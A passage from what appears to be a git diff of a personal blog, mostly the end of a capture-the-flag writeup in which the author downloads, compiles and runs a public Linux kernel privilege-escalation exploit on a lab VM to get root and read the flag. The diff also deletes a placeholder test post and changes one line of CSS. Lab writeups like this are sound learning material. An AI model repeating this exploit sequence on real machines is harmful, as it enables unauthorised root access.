-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!
SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=====================================================================================================================================================================================================&gt;] 6.95K --.-KB/s in 0s
2016-06-19 18:49:37 (94.2 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=======================
2016-06-19 18:52:05 (4.75 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ unzip *
Archive: 39772.zip
creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in &lt;=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in &lt;=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
</code></pre>
</div>
<p>This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.</p>
<p>Next, the flag!</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~&lt;(Congratulations)&gt;~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
</code></pre>
</div>
<p>Woo!</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
<script type="text/javascript" src="http://localhost:4000/javascripts/markdownreader.js"></script>
</body>
</html>

183
_site/writeup/test_post.html
View File

@ -1,183 +0,0 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="This is an excerpt; please ignore">
<title>Test post; Please Ignore</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://paul.walko.org/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="http://paul.walko.org/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="http://paul.walko.org/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="http://paul.walko.org/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="http://paul.walko.org/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="http://paul.walko.org/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="http://paul.walko.org/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="http://paul.walko.org/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="http://paul.walko.org/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="http://paul.walko.org/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="http://paul.walko.org/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="http://paul.walko.org/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="http://paul.walko.org/favicon/favicon-16x16.png">
<link rel="manifest" href="http://paul.walko.org/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/simplePagination.css">
<script type="text/javascript" src="http://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="http://paul.walko.org/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="http://paul.walko.org/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="http://paul.walko.org/category">CATEGORY</a></li>
<li><a href="http://paul.walko.org/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="http://paul.walko.org/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Test post; Please Ignore</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> exploit-exercises</li>
<li><i class="fa fa-tag"></i> nebula</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 26 Sep 2015 under category <a href="http://paul.walko.org/category/">writeup</a></p>
</header>
<p>Really through, ignore this post.</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="http://paul.walko.org/javascripts/base.js"></script>
<script type="text/javascript" src="http://paul.walko.org/javascripts/markdownreader.js"></script>
</body>
</html>

1
stylesheets/base.css
View File

@ -211,6 +211,7 @@ pre,
samp { samp {
font-family: monospace, monospace; font-family: monospace, monospace;
font-size: 1em; font-size: 1em;
background-color:rgba(192,192,192,0.6);
} }
/* Forms /* Forms